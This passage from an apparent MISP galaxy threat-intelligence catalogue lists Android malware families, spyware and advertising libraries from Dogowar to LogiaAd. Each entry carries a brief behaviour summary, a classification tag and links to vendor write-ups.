https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-0313-99

Dogowar

Dogowar is a Trojan horse on the Android platform that sends SMS texts to all contacts on the device. It is a repackaged version of a game application called Dog Wars, which can be downloaded from a third party market and must be manually installed.

The tag is: misp-galaxy:android="Dogowar"

Table 107. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-081510-4323-99

Domob

Domob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Domob"

Table 108. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-4235-99

Dougalek

Dougalek is a Trojan horse for Android devices that steals information from the compromised device. The threat is typically disguised to display a video.

The tag is: misp-galaxy:android="Dougalek"

Table 109. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-041601-3400-99

Dowgin

Dowgin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dowgin"

Table 110. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-033108-4723-99

Droidsheep

Droidsheep is a hacktool for Android devices that hijacks social networking accounts on compromised devices.

The tag is: misp-galaxy:android="Droidsheep"

Table 111. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031014-3628-99

Dropdialer

Dropdialer is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Dropdialer"

Table 112. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-070909-0726-99

Dupvert

Dupvert is a Trojan horse for Android devices that opens a back door and steals information from the compromised device. It may also perform other malicious activities.

The tag is: misp-galaxy:android="Dupvert"

Table 113. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-072313-1959-99

Dynamicit

Dynamicit is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dynamicit"

Table 114. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-1346-99

Ecardgrabber

Ecardgrabber is an application that attempts to read details from NFC enabled credit cards. It attempts to read information from NFC enabled credit cards that are in close proximity.

The tag is: misp-galaxy:android="Ecardgrabber"

Table 115. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062215-0939-99

Ecobatry

Ecobatry is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Ecobatry"

Table 116. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080606-4102-99

Enesoluty

Enesoluty is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Enesoluty"

Table 117. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-090607-0807-99

Everbadge

Everbadge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Everbadge"

Table 118. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-3736-99

Ewalls

Ewalls is a Trojan horse for the Android operating system that steals information from the mobile device.

The tag is: misp-galaxy:android="Ewalls"

Table 119. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2010-073014-0854-99

Exprespam

Exprespam is a Trojan horse for Android devices that displays a fake message and steals personal information stored on the compromised device.

The tag is: misp-galaxy:android="Exprespam"

Table 120. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-010705-2324-99

Fakealbums

Fakealbums is a Trojan horse for Android devices that monitors and forwards received messages from the compromised device.

The tag is: misp-galaxy:android="Fakealbums"

Table 121. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-071819-0636-99

Fakeangry

Fakeangry is a Trojan horse on the Android platform that opens a back door, downloads files, and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Fakeangry"

Table 122. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022823-4233-99

Fakeapp

Fakeapp is a Trojan horse for Android devices that downloads configuration files to display advertisements and collects information from the compromised device.

The tag is: misp-galaxy:android="Fakeapp"

Table 123. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022805-4318-99

Fakebanco

Fakebanco is a Trojan horse for Android devices that redirects users to a phishing page in order to steal their information.

The tag is: misp-galaxy:android="Fakebanco"

Table 124. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-112109-5329-99

Fakebank

Fakebank is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank"

Table 125. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-071813-2448-99

Fakebank.B

Fakebank.B is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank.B"

Table 126. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-101114-5645-99

Fakebok

Fakebok is a Trojan horse for Android devices that sends SMS messages to premium phone numbers.

The tag is: misp-galaxy:android="Fakebok"

Table 127. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-021115-5153-99

Fakedaum

Fakedaum is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakedaum"

Table 128. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-061813-3630-99

Fakedefender

Fakedefender is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender"

Table 129. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-060301-4418-99

Fakedefender.B

Fakedefender.B is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender.B"

Table 130. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-091013-3953-99

Fakedown

Fakedown is a Trojan horse for Android devices that downloads more malicious apps onto the compromised device.

The tag is: misp-galaxy:android="Fakedown"

Table 131. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-041803-5918-99

Fakeflash

Fakeflash is a Trojan horse for Android devices that installs a fake Flash application in order to direct users to a website.

The tag is: misp-galaxy:android="Fakeflash"

Table 132. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-070318-2122-99

Fakegame

Fakegame is a Trojan horse for Android devices that displays advertisements and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakegame"

Table 133. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-040808-2922-99

Fakeguard

Fakeguard is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakeguard"

Table 134. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-102908-3526-99

Fakejob

Fakejob is a Trojan horse for Android devices that redirects users to scam websites.

The tag is: misp-galaxy:android="Fakejob"

Table 135. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030721-3048-99

Fakekakao

Fakekakao is a Trojan horse for Android devices sends SMS messages to contacts stored on the compromised device.

The tag is: misp-galaxy:android="Fakekakao"

Table 136. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-071617-2031-99

Fakelemon

Fakelemon is a Trojan horse for Android devices that blocks certain SMS messages and may subscribe to services without the user’s consent.

The tag is: misp-galaxy:android="Fakelemon"

Table 137. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-120609-3608-99

Fakelicense

Fakelicense is a Trojan horse that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Fakelicense"

Table 138. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-062709-1437-99

Fakelogin

Fakelogin is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakelogin"

Table 139. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-102108-5457-99

FakeLookout

FakeLookout is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="FakeLookout"

Table 140. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-101919-2128-99

FakeMart

FakeMart is a Trojan horse for Android devices that may send SMS messages to premium rate numbers. It may also block incoming messages and steal information from the compromised device.

The tag is: misp-galaxy:android="FakeMart"

Table 141. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-081217-1428-99

Fakemini

Fakemini is a Trojan horse for Android devices that disguises itself as an installation for the Opera Mini browser and sends premium-rate SMS messages to a predetermined number.

The tag is: misp-galaxy:android="Fakemini"

Table 142. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-110410-5958-99

Fakemrat

Fakemrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakemrat"

Table 143. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

Fakeneflic

Fakeneflic is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fakeneflic"

Table 144. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-101105-0518-99

Fakenotify

Fakenotify is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers, collects and sends information, and periodically displays Web pages. It also downloads legitimate apps onto the compromised device.

The tag is: misp-galaxy:android="Fakenotify"

Table 145. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-011302-3052-99

Fakepatch

Fakepatch is a Trojan horse for Android devices that downloads more files on to the device.

The tag is: misp-galaxy:android="Fakepatch"

Table 146. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062811-2820-99

Fakeplay

Fakeplay is a Trojan horse for Android devices that steals information from the compromised device and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Fakeplay"

Table 147. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-100917-3825-99

Fakescarav

Fakescarav is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to pay in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakescarav"

Table 148. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-012809-1901-99

Fakesecsuit

Fakesecsuit is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakesecsuit"

Table 149. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-060514-1301-99

Fakesucon

Fakesucon is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Fakesucon"

Table 150. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-120915-2524-99

Faketaobao

Faketaobao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Faketaobao"

Table 151. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-062518-4057-99

Faketaobao.B

Faketaobao.B is a Trojan horse for Android devices that intercepts and and sends incoming SMS messages to a remote attacker.

The tag is: misp-galaxy:android="Faketaobao.B"

Table 152. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-012106-4013-99

Faketoken

Faketoken is a Trojan horse that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Faketoken"

Table 153. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-032211-2048-99
http://bgr.com/2017/08/18/android-malware-faketoken-steal-credit-card-info/

Fakeupdate

Fakeupdate is a Trojan horse for Android devices that downloads other applications onto the compromised device.

The tag is: misp-galaxy:android="Fakeupdate"

Table 154. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-081914-5637-99

Fakevoice

Fakevoice is a Trojan horse for Android devices that dials a premium-rate phone number.

The tag is: misp-galaxy:android="Fakevoice"

Table 155. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-040510-3249-99

Farmbaby

Farmbaby is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Farmbaby"

Table 156. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-090715-3641-99

Fauxtocopy

Fauxtocopy is a spyware application for Android devices that gathers photos from the device and sends them to a predetermined email address.

The tag is: misp-galaxy:android="Fauxtocopy"

Table 157. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111515-3940-99

Feiwo

Feiwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Feiwo"

Table 158. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-4038-99

FindAndCall

FindAndCall is a Potentially Unwanted Application for Android devices that may leak information.

The tag is: misp-galaxy:android="FindAndCall"

Table 159. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-2906-99

Finfish

Finfish is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Finfish"

Table 160. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-083016-0032-99

Fireleaker

Fireleaker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fireleaker"

Table 161. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-5207-99

Fitikser

Fitikser is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fitikser"

Table 162. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-093015-2830-99

Flexispy

Flexispy is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Flexispy"

Table 163. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-122006-4805-99

Fokonge

Fokonge is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fokonge"

Table 164. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-071802-0727-99

FoncySMS

FoncySMS is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers. It may also connect to an IRC server and execute any received shell commands.

The tag is: misp-galaxy:android="FoncySMS"

Table 165. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-011502-2651-99

Frogonal

Frogonal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Frogonal"

Table 166. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062205-2312-99

Ftad

Ftad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ftad"

Table 167. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040114-2020-99

Funtasy

Funtasy is a Trojan horse for Android devices that subscribes the user to premium SMS services.

The tag is: misp-galaxy:android="Funtasy"

Table 168. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-092519-5811-99

GallMe

GallMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="GallMe"

Table 169. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1336-99

Gamex

Gamex is a Trojan horse for Android devices that downloads further threats.

The tag is: misp-galaxy:android="Gamex"

Table 170. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051015-1808-99

Gappusin

Gappusin is a Trojan horse for Android devices that downloads applications and disguises them as system updates.

The tag is: misp-galaxy:android="Gappusin"

Table 171. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022007-2013-99

Gazon

Gazon is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Gazon"

Table 172. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-030320-1436-99

Geinimi

Geinimi is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Geinimi"

Table 173. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-010111-5403-99

Generisk

Generisk is a generic detection for Android applications that may pose a privacy, security, or stability risk to the user or user’s Android device.

The tag is: misp-galaxy:android="Generisk"

Table 174. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-062622-1559-99

Genheur

Genheur is a generic detection for many individual but varied Trojans for Android devices for which specific definitions have not been created. A generic detection is used because it protects against many Trojans that share similar characteristics.

The tag is: misp-galaxy:android="Genheur"

Table 175. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-0848-99

Genpush

Genpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Genpush"

Table 176. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-033109-0426-99

GeoFake

GeoFake is a Trojan horse for Android devices that sends SMS messages to premium-rate numbers.

The tag is: misp-galaxy:android="GeoFake"

Table 177. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-040217-3232-99

Geplook

Geplook is a Trojan horse for Android devices that downloads additional apps onto the compromised device.

The tag is: misp-galaxy:android="Geplook"

Table 178. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-121814-0917-99

Getadpush

Getadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Getadpush"

Table 179. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-0957-99

Ggtracker

Ggtracker is a Trojan horse for Android devices that sends SMS messages to a premium-rate number. It may also steal information from the device.

The tag is: misp-galaxy:android="Ggtracker"

Table 180. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-062208-5013-99

Ghostpush

Ghostpush is a Trojan horse for Android devices that roots the compromised device. It may then perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Ghostpush"

Table 181. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-100215-3718-99

Gmaster

Gmaster is a Trojan horse on the Android platform that steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Gmaster"

Table 182. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-082404-5049-99

Godwon

Godwon is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Godwon"

Table 183. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-091017-1833-99

Golddream

Golddream is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Golddream"

Table 184. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-070608-4139-99

Goldeneagle

Goldeneagle is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Goldeneagle"

Table 185. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-090110-3712-99

Golocker

Golocker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Golocker"

Table 186. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062003-3214-99

Gomal

Gomal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Gomal"

Table 187. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-101312-1047-99

Gonesixty

Gonesixty is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonesixty"

Table 188. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-093001-2649-99

Gonfu

Gonfu is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu"

Table 189. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-060610-3953-99

Gonfu.B

Gonfu.B is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu.B"

Table 190. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-030811-5215-99

Gonfu.C

Gonfu.C is a Trojan horse for Android devices that may download additional threats on the compromised device.

The tag is: misp-galaxy:android="Gonfu.C"

Table 191. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031817-3639-99

Gonfu.D

Gonfu.D is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Gonfu.D"

Table 192. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-040414-1158-99

Gooboot

Gooboot is a Trojan horse for Android devices that may send text messages to premium rate numbers.

The tag is: misp-galaxy:android="Gooboot"

Table 193. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031818-3034-99

Goodadpush

Goodadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Goodadpush"

Table 194. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0913-99

Greystripe

Greystripe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Greystripe"

Table 195. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-2643-99

Gugespy

Gugespy is a spyware program for Android devices that logs the device’s activity and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Gugespy"

Table 196. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071822-2515-99

Gugespy.B

Gugespy.B is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Gugespy.B"

Table 197. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-070511-5038-99

Gupno

Gupno is a Trojan horse for Android devices that poses as a legitimate app and attempts to charge users for features that are normally free. It may also display advertisements on the compromised device.

The tag is: misp-galaxy:android="Gupno"

Table 198. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-072211-5533-99

Habey

Habey is a Trojan horse for Android devices that may attempt to delete files and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Habey"

Table 199. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-100608-4512-99

Handyclient

Handyclient is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Handyclient"

Table 200. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5027-99

Hehe

Hehe is a Trojan horse for Android devices that blocks incoming calls and SMS messages from specific numbers. The Trojan also steals information from the compromised device.

The tag is: misp-galaxy:android="Hehe"

Table 201. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-012211-0020-99

Hesperbot

Hesperbot is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="Hesperbot"

Table 202. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-121010-1120-99

Hippo

Hippo is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo"

Table 203. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-071215-3547-99

Hippo.B

Hippo.B is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo.B"

Table 204. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031915-0151-99

IadPush

IadPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="IadPush"

Table 205. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4104-99

iBanking

iBanking is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="iBanking"

Table 206. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030713-0559-99

Iconosis

Iconosis is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosis"

Table 207. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062107-3327-99

Iconosys

Iconosys is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosys"

Table 208. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-081309-0341-99

Igexin

Igexin is an advertisement library that is bundled with certain Android applications. Igexin has the capability of spying on victims through otherwise benign apps by downloading malicious plugins,

The tag is: misp-galaxy:android="Igexin"

Igexin is also known as:

IcicleGum

View relationships graph

Igexin has relationships with:

similar: misp-galaxy:android="IcicleGum" with estimative-language:likelihood-probability="likely"

Table 209. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-032606-5519-99
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf
https://blog.lookout.com/igexin-malicious-sdk

ImAdPush

ImAdPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ImAdPush"

Table 210. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040323-0218-99

InMobi

InMobi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="InMobi"

Table 211. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-1527-99

Jifake

Jifake is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Jifake"

Table 212. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-073021-4247-99

Jollyserv

Jollyserv is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Jollyserv"

Table 213. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-090311-4533-99

Jsmshider

Jsmshider is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Jsmshider"

Table 214. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-062114-0857-99

Ju6

Ju6 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ju6"

Table 215. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2428-99

Jumptap

Jumptap is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jumptap"

Table 216. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0859-99

Jzmob

Jzmob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jzmob"

Table 217. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-1703-99

Kabstamper

Kabstamper is a Trojan horse for Android devices that corrupts images found on the compromised device.

The tag is: misp-galaxy:android="Kabstamper"

Table 218. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-060706-2305-99

Kidlogger

Kidlogger is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Kidlogger"

Table 219. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-122014-1927-99

Kielog

Kielog is a Trojan horse for Android devices that logs keystrokes and sends the stolen information to the remote attacker.

The tag is: misp-galaxy:android="Kielog"

Table 220. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-040205-4035-99

Kituri

Kituri is a Trojan horse for Android devices that blocks certain SMS messages from being received by the device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Kituri"

Table 221. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-061111-5350-99

Kranxpay

Kranxpay is a Trojan horse for Android devices that downloads other apps onto the device.

The tag is: misp-galaxy:android="Kranxpay"

Table 222. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-071009-0809-99

Krysanec

Krysanec is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Krysanec"

Table 223. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-090113-4128-99

Kuaidian360

Kuaidian360 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuaidian360"

Table 224. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040109-2415-99

Kuguo

Kuguo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuguo"

Table 225. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-5215-99

Lastacloud

Lastacloud is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Lastacloud"

Table 226. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-121216-4334-99

Laucassspy

Laucassspy is a spyware program for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Laucassspy"

Table 227. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-092409-1822-99

Lifemonspy

Lifemonspy is a spyware application for Android devices that can track the phone’s location, download SMS messages, and erase certain data from the device.

The tag is: misp-galaxy:android="Lifemonspy"

Table 228. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-5540-99

Lightdd

Lightdd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Lightdd"

Table 229. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-053114-2342-99

Loaderpush

Loaderpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Loaderpush"

Table 230. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0244-99

Locaspy

Locaspy is a Potentially Unwanted Application for Android devices that tracks the location of the compromised device.

The tag is: misp-galaxy:android="Locaspy"

Table 231. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030720-3500-99

Lockdroid.E

Lockdroid.E is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.E"

Table 232. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-103005-2209-99

Lockdroid.F

Lockdroid.F is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.F"

Table 233. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-102215-4346-99

Lockdroid.G

Lockdroid.G is a Trojan horse for Android devices that may display a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.G"

Table 234. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-050610-2450-99

Lockdroid.H

Lockdroid.H is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.H"

Table 235. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2016-031621-1349-99

Lockscreen

Lockscreen is a Trojan horse for Android devices that locks the compromised device from use.

The tag is: misp-galaxy:android="Lockscreen"

Table 236. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-032409-0743-99

LogiaAd

LogiaAd is an advertisement library that is bundled with certain Android applications.

